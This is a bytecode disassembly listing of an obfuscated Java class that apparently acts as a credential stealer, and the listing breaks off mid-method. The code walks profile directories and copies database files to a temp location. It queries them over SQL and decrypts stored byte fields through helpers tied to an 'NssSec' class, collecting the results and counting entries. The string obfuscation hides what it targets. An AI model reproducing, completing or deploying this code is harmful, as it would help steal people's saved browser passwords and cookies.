Compiled from "a.java"
public class a.b.d.a {
  private static final java.lang.String s;

  private static int I;

  private static int J;

  private static int g;

  private static int k;

  private static final java.lang.String[] a;

  private static final java.lang.String[] b;

  private static final long[] c;

  private static final java.lang.Long[] d;

  public a.b.d.a();
    Code:
         0: aload_0
         1: invokespecial #266                // Method java/lang/Object."<init>":()V
         4: return

  public static void r();
    Code:
         0: ldc2_w        #373                // long 112894481136777l
         3: lstore_0
         4: lload_0
         5: dup2
         6: ldc2_w        #375                // long 45345365203488l
         9: lxor
        10: lstore_2
        11: pop2
        12: iconst_0
        13: putstatic     #94                 // Field I:I
        16: iconst_0
        17: putstatic     #178                // Field J:I
        20: iconst_0
        21: putstatic     #224                // Field g:I
        24: iconst_0
        25: putstatic     #252                // Field k:I
        28: ldc           #12                 // int -1265742990
        30: sipush        -12090
        33: iadd
        34: ldc           #12                 // int -1265742990
        36: sipush        -2930
        39: isub
        40: lload_0
        41: l2i
        42: invokestatic  #354                // Method a:(III)Ljava/lang/String;
        45: invokestatic  #202                // Method a/b/d/dec.k:(Ljava/lang/String;)V
        48: ldc           #12                 // int -1265742990
        50: sipush        -12093
        53: iadd
        54: ldc           #12                 // int -1265742990
        56: sipush        -11553
        59: isub
        60: lload_0
        61: l2i
        62: invokestatic  #354                // Method a:(III)Ljava/lang/String;
        65: invokestatic  #325                // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
        68: ldc           #12                 // int -1265742990
        70: sipush        -12099
        73: iadd
        74: ldc           #12                 // int -1265742990
        76: sipush        -5909
        79: iadd
        80: lload_0
        81: l2i
        82: invokestatic  #354                // Method a:(III)Ljava/lang/String;
        85: invokedynamic #41,  0             // InvokeDynamic #0:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
        90: astore        4
        92: aload         4
        94: ldc           #16                 // String
        96: invokestatic  #119                // Method a/b/d/dec.g:(Ljava/lang/String;Ljava/lang/String;)V
        99: aload         4
       101: lload_2
       102: iconst_2
       103: anewarray     #272                // class java/lang/Object
       106: dup_x2
       107: dup_x2
       108: pop
       109: invokestatic  #287                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       112: iconst_1
       113: swap
       114: aastore
       115: dup_x1
       116: swap
       117: iconst_0
       118: swap
       119: aastore
       120: invokestatic  #204                // Method a:([Ljava/lang/Object;)V
       123: ldc           #12                 // int -1265742990
       125: sipush        -12117
       128: iadd
       129: ldc           #1                  // int 1265742990
       131: sipush        19239
       134: iadd
       135: lload_0
       136: l2i
       137: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       140: ldc           #12                 // int -1265742990
       142: sipush        -12089
       145: iadd
       146: ldc           #12                 // int -1265742990
       148: sipush        -12955
       151: iadd
       152: lload_0
       153: l2i
       154: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       157: getstatic     #94                 // Field I:I
       160: invokestatic  #31                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       163: ldc           #12                 // int -1265742990
       165: sipush        -12131
       168: iadd
       169: ldc           #12                 // int -1265742990
       171: sipush        -4428
       174: isub
       175: lload_0
       176: l2i
       177: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       180: ldc           #12                 // int -1265742990
       182: sipush        -12098
       185: iadd
       186: ldc           #12                 // int -1265742990
       188: sipush        -4786
       191: iadd
       192: lload_0
       193: l2i
       194: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       197: getstatic     #178                // Field J:I
       200: invokestatic  #31                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       203: ldc           #12                 // int -1265742990
       205: sipush        -12131
       208: iadd
       209: ldc           #12                 // int -1265742990
       211: sipush        -4428
       214: isub
       215: lload_0
       216: l2i
       217: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       220: ldc           #12                 // int -1265742990
       222: sipush        -12120
       225: iadd
       226: ldc           #12                 // int -1265742990
       228: sipush        -10226
       231: iadd
       232: lload_0
       233: l2i
       234: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       237: getstatic     #224                // Field g:I
       240: invokestatic  #31                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       243: ldc           #12                 // int -1265742990
       245: sipush        -12131
       248: iadd
       249: ldc           #12                 // int -1265742990
       251: sipush        -4428
       254: isub
       255: lload_0
       256: l2i
       257: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       260: ldc           #12                 // int -1265742990
       262: sipush        -12134
       265: iadd
       266: ldc           #1                  // int 1265742990
       268: sipush        16028
       271: iadd
       272: lload_0
       273: l2i
       274: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       277: getstatic     #252                // Field k:I
       280: invokestatic  #31                 // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       283: return

  private static void a(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #110                // class java/lang/String
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #173                // class java/lang/Long
        14: invokevirtual #36                 // Method java/lang/Long.longValue:()J
        17: lstore_2
        18: pop
        19: lload_2
        20: dup2
        21: ldc2_w        #377                // long 62664267013548l
        24: lxor
        25: lstore        4
        27: pop2
        28: getstatic     #167                // Field a/b/d/dec$NssSec.m:Z
        31: new           #289                // class java/io/File
        34: dup
        35: aload_1
        36: invokespecial #304                // Method java/io/File."<init>":(Ljava/lang/String;)V
        39: astore        7
        41: istore        6
        43: aload         7
        45: iload         6
        47: ifne          113
        50: invokevirtual #196                // Method java/io/File.exists:()Z
        53: ifne          62
        56: goto          60
        59: athrow
        60: return
        61: athrow
        62: lload         4
        64: aload         7
        66: ldc           #13                 // int 2129494290
        68: sipush        -1271
        71: i2c
        72: isub
        73: ldc           #13                 // int 2129494290
        75: sipush        -9799
        78: i2c
        79: isub
        80: lload_2
        81: l2i
        82: invokestatic  #354                // Method a:(III)Ljava/lang/String;
        85: iconst_3
        86: anewarray     #272                // class java/lang/Object
        89: dup_x1
        90: swap
        91: iconst_2
        92: swap
        93: aastore
        94: dup_x1
        95: swap
        96: iconst_1
        97: swap
        98: aastore
        99: dup_x2
       100: dup_x2
       101: pop
       102: invokestatic  #287                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       105: iconst_0
       106: swap
       107: aastore
       108: invokestatic  #243                // Method n:([Ljava/lang/Object;)V
       111: aload         7
       113: invokevirtual #322                // Method java/io/File.listFiles:()[Ljava/io/File;
       116: astore        8
       118: aload         8
       120: iload         6
       122: ifne          135
       125: ifnonnull     133
       128: goto          132
       131: athrow
       132: return
       133: aload         8
       135: astore        9
       137: aload         9
       139: arraylength
       140: istore        10
       142: iconst_0
       143: istore        11
       145: iload         11
       147: iload         10
       149: if_icmpge     349
       152: aload         9
       154: iload         11
       156: aaload
       157: astore        12
       159: iload         6
       161: lload_2
       162: lconst_0
       163: lcmp
       164: iflt          346
       167: ifne          344
       170: aload         12
       172: invokevirtual #154                // Method java/io/File.isDirectory:()Z
       175: ifeq          341
       178: goto          182
       181: athrow
       182: aload         12
       184: iload         6
       186: ifne          287
       189: goto          193
       192: athrow
       193: lload_2
       194: lconst_0
       195: lcmp
       196: ifle          283
       199: invokevirtual #283                // Method java/io/File.getName:()Ljava/lang/String;
       202: ldc           #13                 // int 2129494290
       204: sipush        -1325
       207: i2c
       208: isub
       209: ldc           #9                  // int -2129494290
       211: sipush        -23974
       214: i2c
       215: ineg
       216: isub
       217: lload_2
       218: l2i
       219: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       222: invokevirtual #256                // Method java/lang/String.equals:(Ljava/lang/Object;)Z
       225: ifne          281
       228: goto          232
       231: athrow
       232: lload_2
       233: lconst_0
       234: lcmp
       235: iflt          336
       238: aload         12
       240: iload         6
       242: ifne          287
       245: goto          249
       248: athrow
       249: invokevirtual #283                // Method java/io/File.getName:()Ljava/lang/String;
       252: ldc           #13                 // int 2129494290
       254: sipush        -1317
       257: i2c
       258: isub
       259: ldc           #13                 // int 2129494290
       261: sipush        -26807
       264: i2c
       265: isub
       266: lload_2
       267: l2i
       268: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       271: invokevirtual #208                // Method java/lang/String.startsWith:(Ljava/lang/String;)Z
       274: ifeq          341
       277: goto          281
       280: athrow
       281: aload         12
       283: goto          287
       286: athrow
       287: aload         12
       289: invokevirtual #283                // Method java/io/File.getName:()Ljava/lang/String;
       292: lload         4
       294: dup2_x2
       295: pop2
       296: iconst_3
       297: anewarray     #272                // class java/lang/Object
       300: dup_x1
       301: swap
       302: iconst_2
       303: swap
       304: aastore
       305: dup_x1
       306: swap
       307: iconst_1
       308: swap
       309: aastore
       310: dup_x2
       311: dup_x2
       312: pop
       313: invokestatic  #287                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       316: iconst_0
       317: swap
       318: aastore
       319: invokestatic  #243                // Method n:([Ljava/lang/Object;)V
       322: sipush        27064
       325: ldc2_w        #371                // long 2162822300791749307l
       328: lload_2
       329: lxor
       330: invokestatic  #117                // Method a:(IJ)J
       333: invokestatic  #337                // Method java/lang/Thread.sleep:(J)V
       336: goto          341
       339: astore        13
       341: iinc          11, 1
       344: iload         6
       346: ifeq          145
       349: return
      Exception table:
         from    to  target type
           249   283   286   Class java/lang/Exception
           232   277   280   Class java/lang/Exception
           193   245   248   Class java/lang/Exception
           182   228   231   Class java/lang/Exception
           170   189   192   Class java/lang/Exception
           159   178   181   Class java/lang/Exception
           118   128   131   Class java/lang/Exception
            50    61    61   Class java/lang/Exception
            43    56    59   Class java/lang/Exception
           322   336   339   Class java/lang/Exception

  private static void n(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #173                // class java/lang/Long
         7: invokevirtual #36                 // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: dup
        12: iconst_1
        13: aaload
        14: checkcast     #289                // class java/io/File
        17: astore_3
        18: dup
        19: iconst_2
        20: aaload
        21: checkcast     #110                // class java/lang/String
        24: astore        4
        26: pop
        27: lload_1
        28: dup2
        29: ldc2_w        #365                // long 67675932173746l
        32: lxor
        33: lstore        5
        35: pop2
        36: getstatic     #167                // Field a/b/d/dec$NssSec.m:Z
        39: istore        7
        41: new           #289                // class java/io/File
        44: dup
        45: aload_3
        46: ldc           #18                 // int 1468770420
        48: sipush        -3275
        51: i2c
        52: iadd
        53: ldc           #18                 // int 1468770420
        55: sipush        -7561
        58: i2c
        59: iadd
        60: lload_1
        61: l2i
        62: invokestatic  #354                // Method a:(III)Ljava/lang/String;
        65: invokespecial #254                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        68: iload         7
        70: ifne          625
        73: invokevirtual #196                // Method java/io/File.exists:()Z
        76: ifne          162
        79: new           #289                // class java/io/File
        82: dup
        83: aload_3
        84: ldc           #18                 // int 1468770420
        86: sipush        -3293
        89: i2c
        90: iadd
        91: ldc           #4                  // int 1468901490
        93: sipush        -10059
        96: i2c
        97: isub
        98: lload_1
        99: l2i
       100: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       103: invokespecial #254                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       106: iload         7
       108: ifne          625
       111: invokevirtual #196                // Method java/io/File.exists:()Z
       114: ifne          162
       117: new           #289                // class java/io/File
       120: dup
       121: aload_3
       122: ldc           #18                 // int 1468770420
       124: sipush        -3287
       127: i2c
       128: iadd
       129: ldc           #18                 // int 1468770420
       131: sipush        -3931
       134: i2c
       135: iadd
       136: lload_1
       137: l2i
       138: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       141: invokespecial #254                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       144: iload         7
       146: lload_1
       147: lconst_0
       148: lcmp
       149: iflt          632
       152: ifne          625
       155: invokevirtual #196                // Method java/io/File.exists:()Z
       158: ifne          162
       161: return
       162: aload_3
       163: ldc           #18                 // int 1468770420
       165: sipush        -3261
       168: i2c
       169: iadd
       170: ldc           #14                 // int -1468901490
       172: sipush        -11817
       175: i2c
       176: ineg
       177: isub
       178: lload_1
       179: l2i
       180: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       183: ldc           #18                 // int 1468770420
       185: sipush        -3268
       188: i2c
       189: iadd
       190: ldc           #7                  // int -1468770420
       192: sipush        -532
       195: i2c
       196: ineg
       197: iadd
       198: lload_1
       199: l2i
       200: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       203: aload         4
       205: ldc           #18                 // int 1468770420
       207: sipush        -3274
       210: i2c
       211: iadd
       212: ldc           #4                  // int 1468901490
       214: bipush        -77
       216: i2c
       217: isub
       218: lload_1
       219: l2i
       220: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       223: iconst_1
       224: lload         5
       226: bipush        7
       228: anewarray     #272                // class java/lang/Object
       231: dup_x2
       232: dup_x2
       233: pop
       234: invokestatic  #287                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       237: bipush        6
       239: swap
       240: aastore
       241: dup_x1
       242: swap
       243: invokestatic  #115                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       246: iconst_5
       247: swap
       248: aastore
       249: dup_x1
       250: swap
       251: iconst_4
       252: swap
       253: aastore
       254: dup_x1
       255: swap
       256: iconst_3
       257: swap
       258: aastore
       259: dup_x1
       260: swap
       261: iconst_2
       262: swap
       263: aastore
       264: dup_x1
       265: swap
       266: iconst_1
       267: swap
       268: aastore
       269: dup_x1
       270: swap
       271: iconst_0
       272: swap
       273: aastore
       274: invokestatic  #163                // Method I:([Ljava/lang/Object;)V
       277: aload_3
       278: ldc           #18                 // int 1468770420
       280: sipush        -3300
       283: i2c
       284: iadd
       285: ldc           #18                 // int 1468770420
       287: sipush        -4769
       290: i2c
       291: iadd
       292: lload_1
       293: l2i
       294: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       297: ldc           #18                 // int 1468770420
       299: sipush        -3255
       302: i2c
       303: iadd
       304: ldc           #4                  // int 1468901490
       306: sipush        -6975
       309: i2c
       310: isub
       311: lload_1
       312: l2i
       313: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       316: aload         4
       318: ldc           #18                 // int 1468770420
       320: sipush        -3283
       323: i2c
       324: iadd
       325: ldc           #7                  // int -1468770420
       327: sipush        -8915
       330: i2c
       331: ineg
       332: iadd
       333: lload_1
       334: l2i
       335: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       338: iconst_2
       339: lload         5
       341: bipush        7
       343: anewarray     #272                // class java/lang/Object
       346: dup_x2
       347: dup_x2
       348: pop
       349: invokestatic  #287                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       352: bipush        6
       354: swap
       355: aastore
       356: dup_x1
       357: swap
       358: invokestatic  #115                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       361: iconst_5
       362: swap
       363: aastore
       364: dup_x1
       365: swap
       366: iconst_4
       367: swap
       368: aastore
       369: dup_x1
       370: swap
       371: iconst_3
       372: swap
       373: aastore
       374: dup_x1
       375: swap
       376: iconst_2
       377: swap
       378: aastore
       379: dup_x1
       380: swap
       381: iconst_1
       382: swap
       383: aastore
       384: dup_x1
       385: swap
       386: iconst_0
       387: swap
       388: aastore
       389: invokestatic  #163                // Method I:([Ljava/lang/Object;)V
       392: aload_3
       393: ldc           #18                 // int 1468770420
       395: sipush        -3310
       398: i2c
       399: iadd
       400: ldc           #14                 // int -1468901490
       402: sipush        -4132
       405: i2c
       406: ineg
       407: isub
       408: lload_1
       409: l2i
       410: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       413: ldc           #18                 // int 1468770420
       415: sipush        -3273
       418: i2c
       419: iadd
       420: ldc           #14                 // int -1468901490
       422: sipush        -2265
       425: i2c
       426: ineg
       427: isub
       428: lload_1
       429: l2i
       430: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       433: aload         4
       435: ldc           #18                 // int 1468770420
       437: sipush        -3284
       440: i2c
       441: iadd
       442: ldc           #4                  // int 1468901490
       444: sipush        -21829
       447: i2c
       448: isub
       449: lload_1
       450: l2i
       451: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       454: iconst_3
       455: lload         5
       457: bipush        7
       459: anewarray     #272                // class java/lang/Object
       462: dup_x2
       463: dup_x2
       464: pop
       465: invokestatic  #287                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       468: bipush        6
       470: swap
       471: aastore
       472: dup_x1
       473: swap
       474: invokestatic  #115                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       477: iconst_5
       478: swap
       479: aastore
       480: dup_x1
       481: swap
       482: iconst_4
       483: swap
       484: aastore
       485: dup_x1
       486: swap
       487: iconst_3
       488: swap
       489: aastore
       490: dup_x1
       491: swap
       492: iconst_2
       493: swap
       494: aastore
       495: dup_x1
       496: swap
       497: iconst_1
       498: swap
       499: aastore
       500: dup_x1
       501: swap
       502: iconst_0
       503: swap
       504: aastore
       505: invokestatic  #163                // Method I:([Ljava/lang/Object;)V
       508: aload_3
       509: ldc           #18                 // int 1468770420
       511: sipush        -3288
       514: i2c
       515: iadd
       516: ldc           #4                  // int 1468901490
       518: sipush        -21741
       521: i2c
       522: isub
       523: lload_1
       524: l2i
       525: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       528: ldc           #18                 // int 1468770420
       530: sipush        -3285
       533: i2c
       534: iadd
       535: ldc           #14                 // int -1468901490
       537: sipush        -13475
       540: i2c
       541: ineg
       542: isub
       543: lload_1
       544: l2i
       545: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       548: aload         4
       550: ldc           #18                 // int 1468770420
       552: sipush        -3282
       555: i2c
       556: iadd
       557: ldc           #14                 // int -1468901490
       559: sipush        -13144
       562: i2c
       563: ineg
       564: isub
       565: lload_1
       566: l2i
       567: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       570: iconst_5
       571: lload         5
       573: bipush        7
       575: anewarray     #272                // class java/lang/Object
       578: dup_x2
       579: dup_x2
       580: pop
       581: invokestatic  #287                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       584: bipush        6
       586: swap
       587: aastore
       588: dup_x1
       589: swap
       590: invokestatic  #115                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       593: iconst_5
       594: swap
       595: aastore
       596: dup_x1
       597: swap
       598: iconst_4
       599: swap
       600: aastore
       601: dup_x1
       602: swap
       603: iconst_3
       604: swap
       605: aastore
       606: dup_x1
       607: swap
       608: iconst_2
       609: swap
       610: aastore
       611: dup_x1
       612: swap
       613: iconst_1
       614: swap
       615: aastore
       616: dup_x1
       617: swap
       618: iconst_0
       619: swap
       620: aastore
       621: invokestatic  #163                // Method I:([Ljava/lang/Object;)V
       624: aload_3
       625: ldc           #18                 // int 1468770420
       627: sipush        -3271
       630: i2c
       631: iadd
       632: ldc           #14                 // int -1468901490
       634: sipush        -3182
       637: i2c
       638: ineg
       639: isub
       640: lload_1
       641: l2i
       642: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       645: ldc           #18                 // int 1468770420
       647: sipush        -3314
       650: i2c
       651: iadd
       652: ldc           #7                  // int -1468770420
       654: sipush        -8701
       657: i2c
       658: ineg
       659: iadd
       660: lload_1
       661: l2i
       662: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       665: aload         4
       667: ldc           #18                 // int 1468770420
       669: sipush        -3296
       672: i2c
       673: iadd
       674: ldc           #14                 // int -1468901490
       676: sipush        -1954
       679: i2c
       680: ineg
       681: isub
       682: lload_1
       683: l2i
       684: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       687: iconst_4
       688: lload         5
       690: bipush        7
       692: anewarray     #272                // class java/lang/Object
       695: dup_x2
       696: dup_x2
       697: pop
       698: invokestatic  #287                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       701: bipush        6
       703: swap
       704: aastore
       705: dup_x1
       706: swap
       707: invokestatic  #115                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       710: iconst_5
       711: swap
       712: aastore
       713: dup_x1
       714: swap
       715: iconst_4
       716: swap
       717: aastore
       718: dup_x1
       719: swap
       720: iconst_3
       721: swap
       722: aastore
       723: dup_x1
       724: swap
       725: iconst_2
       726: swap
       727: aastore
       728: dup_x1
       729: swap
       730: iconst_1
       731: swap
       732: aastore
       733: dup_x1
       734: swap
       735: iconst_0
       736: swap
       737: aastore
       738: invokestatic  #163                // Method I:([Ljava/lang/Object;)V
       741: return

  private static void I(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #289                // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #110                // class java/lang/String
        14: astore_2
        15: dup
        16: iconst_2
        17: aaload
        18: checkcast     #110                // class java/lang/String
        21: astore_3
        22: dup
        23: iconst_3
        24: aaload
        25: checkcast     #110                // class java/lang/String
        28: astore        4
        30: dup
        31: iconst_4
        32: aaload
        33: checkcast     #110                // class java/lang/String
        36: astore        5
        38: dup
        39: iconst_5
        40: aaload
        41: checkcast     #127                // class java/lang/Integer
        44: invokevirtual #70                 // Method java/lang/Integer.intValue:()I
        47: istore        6
        49: dup
        50: bipush        6
        52: aaload
        53: checkcast     #173                // class java/lang/Long
        56: invokevirtual #36                 // Method java/lang/Long.longValue:()J
        59: lstore        7
        61: pop
        62: getstatic     #167                // Field a/b/d/dec$NssSec.m:Z
        65: new           #289                // class java/io/File
        68: dup
        69: aload_1
        70: aload_2
        71: invokespecial #254                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        74: astore        10
        76: istore        9
        78: aload         10
        80: invokevirtual #196                // Method java/io/File.exists:()Z
        83: iload         9
        85: ifne          156
        88: ifne          142
        91: goto          95
        94: athrow
        95: iload         6
        97: iload         9
        99: ifne          156
       102: goto          106
       105: athrow
       106: iconst_2
       107: if_icmpne     142
       110: goto          114
       113: athrow
       114: new           #289                // class java/io/File
       117: dup
       118: aload_1
       119: ldc           #15                 // int 1349103510
       121: sipush        29050
       124: isub
       125: ldc           #15                 // int 1349103510
       127: sipush        20841
       130: isub
       131: lload         7
       133: l2i
       134: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       137: invokespecial #254                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       140: astore        10
       142: aload         10
       144: iload         9
       146: ifne          195
       149: invokevirtual #196                // Method java/io/File.exists:()Z
       152: goto          156
       155: athrow
       156: ifne          160
       159: return
       160: new           #289                // class java/io/File
       163: dup
       164: ldc           #15                 // int 1349103510
       166: sipush        29025
       169: isub
       170: ldc           #15                 // int 1349103510
       172: sipush        -24321
       175: i2c
       176: isub
       177: lload         7
       179: l2i
       180: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       183: invokestatic  #107                // Method java/lang/System.getProperty:(Ljava/lang/String;)Ljava/lang/String;
       186: invokestatic  #329                // Method java/util/UUID.randomUUID:()Ljava/util/UUID;
       189: invokevirtual #334                // Method java/util/UUID.toString:()Ljava/lang/String;
       192: invokespecial #249                // Method java/io/File."<init>":(Ljava/lang/String;Ljava/lang/String;)V
       195: astore        11
       197: aload         10
       199: iload         9
       201: ifne          247
       204: aload         11
       206: ldc           #15                 // int 1349103510
       208: sipush        29056
       211: isub
       212: ldc           #15                 // int 1349103510
       214: sipush        -30804
       217: i2c
       218: isub
       219: lload         7
       221: l2i
       222: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       225: invokestatic  #316                // Method a/b/d/dec.cp:(Ljava/io/File;Ljava/io/File;Ljava/lang/String;)Z
       228: lload         7
       230: lconst_0
       231: lcmp
       232: iflt          243
       235: ifne          245
       238: aload         11
       240: invokevirtual #227                // Method java/io/File.delete:()Z
       243: pop
       244: return
       245: aload         11
       247: invokevirtual #116                // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       250: ldc           #15                 // int 1349103510
       252: sipush        29039
       255: isub
       256: ldc           #15                 // int 1349103510
       258: sipush        15680
       261: isub
       262: lload         7
       264: l2i
       265: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       268: swap
       269: invokedynamic #229,  0            // InvokeDynamic #1:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       274: invokestatic  #151                // Method java/sql/DriverManager.getConnection:(Ljava/lang/String;)Ljava/sql/Connection;
       277: astore        12
       279: aload         12
       281: invokeinterface #234,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       286: astore        13
       288: aload         13
       290: aload_3
       291: invokeinterface #97,  2           // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       296: astore        14
       298: new           #128                // class java/lang/StringBuilder
       301: dup
       302: invokespecial #137                // Method java/lang/StringBuilder."<init>":()V
       305: astore        15
       307: iload         6
       309: iconst_5
       310: iload         9
       312: ifne          853
       315: if_icmpne     837
       318: goto          322
       321: athrow
       322: new           #156                // class java/util/HashMap
       325: dup
       326: invokespecial #233                // Method java/util/HashMap."<init>":()V
       329: astore        16
       331: aload         12
       333: invokeinterface #234,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       338: ldc           #15                 // int 1349103510
       340: sipush        29038
       343: isub
       344: ldc           #15                 // int 1349103510
       346: sipush        18997
       349: isub
       350: lload         7
       352: l2i
       353: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       356: invokeinterface #97,  2           // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       361: astore        17
       363: aload         17
       365: invokeinterface #213,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       370: ifeq          443
       373: aload         17
       375: iconst_2
       376: invokeinterface #236,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       381: invokestatic  #53                 // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       384: astore        18
       386: aload         18
       388: iload         9
       390: lload         7
       392: lconst_0
       393: lcmp
       394: iflt          402
       397: ifne          1833
       400: iload         9
       402: ifne          437
       405: goto          409
       408: athrow
       409: ifnull        438
       412: goto          416
       415: athrow
       416: aload         16
       418: aload         17
       420: iconst_1
       421: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       426: aload         18
       428: invokeinterface #251,  3          // InterfaceMethod java/util/Map.put:(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
       433: goto          437
       436: athrow
       437: pop
       438: iload         9
       440: ifeq          363
       443: lload         7
       445: lconst_0
       446: lcmp
       447: ifle          478
       450: aload         17
       452: iload         9
       454: lload         7
       456: lconst_0
       457: lcmp
       458: iflt          376
       461: ifne          473
       464: ifnull        526
       467: goto          471
       470: athrow
       471: aload         17
       473: invokeinterface #314,  1          // InterfaceMethod java/sql/ResultSet.close:()V
       478: goto          526
       481: astore        18
       483: lload         7
       485: lconst_0
       486: lcmp
       487: iflt          511
       490: aload         17
       492: iload         9
       494: ifne          506
       497: ifnull        523
       500: goto          504
       503: athrow
       504: aload         17
       506: invokeinterface #314,  1          // InterfaceMethod java/sql/ResultSet.close:()V
       511: goto          523
       514: astore        19
       516: aload         18
       518: aload         19
       520: invokevirtual #84                 // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
       523: aload         18
       525: athrow
       526: goto          531
       529: astore        17
       531: aload         14
       533: invokeinterface #213,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       538: ifeq          818
       541: aload         14
       543: iconst_5
       544: invokeinterface #236,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       549: invokestatic  #53                 // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       552: astore        17
       554: iload         9
       556: lload         7
       558: lconst_0
       559: lcmp
       560: iflt          737
       563: ifne          715
       566: aload         17
       568: iload         9
       570: ifne          1833
       573: goto          577
       576: athrow
       577: ifnull        813
       580: goto          584
       583: athrow
       584: getstatic     #252                // Field k:I
       587: iconst_1
       588: iadd
       589: putstatic     #252                // Field k:I
       592: aload         15
       594: ldc           #15                 // int 1349103510
       596: sipush        29022
       599: isub
       600: ldc           #15                 // int 1349103510
       602: sipush        32315
       605: isub
       606: lload         7
       608: l2i
       609: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       612: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       615: aload         14
       617: iconst_2
       618: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       623: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       626: ldc           #15                 // int 1349103510
       628: sipush        29068
       631: isub
       632: ldc           #15                 // int 1349103510
       634: sipush        -31279
       637: i2c
       638: isub
       639: lload         7
       641: l2i
       642: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       645: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       648: aload         17
       650: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       653: ldc           #15                 // int 1349103510
       655: sipush        29023
       658: isub
       659: ldc           #15                 // int 1349103510
       661: sipush        29437
       664: isub
       665: lload         7
       667: l2i
       668: invokestatic  #354                // Method a:(III)Ljava/lang/String;
       671: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       674: aload         14
       676: iconst_3
       677: invokeinterface #43,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
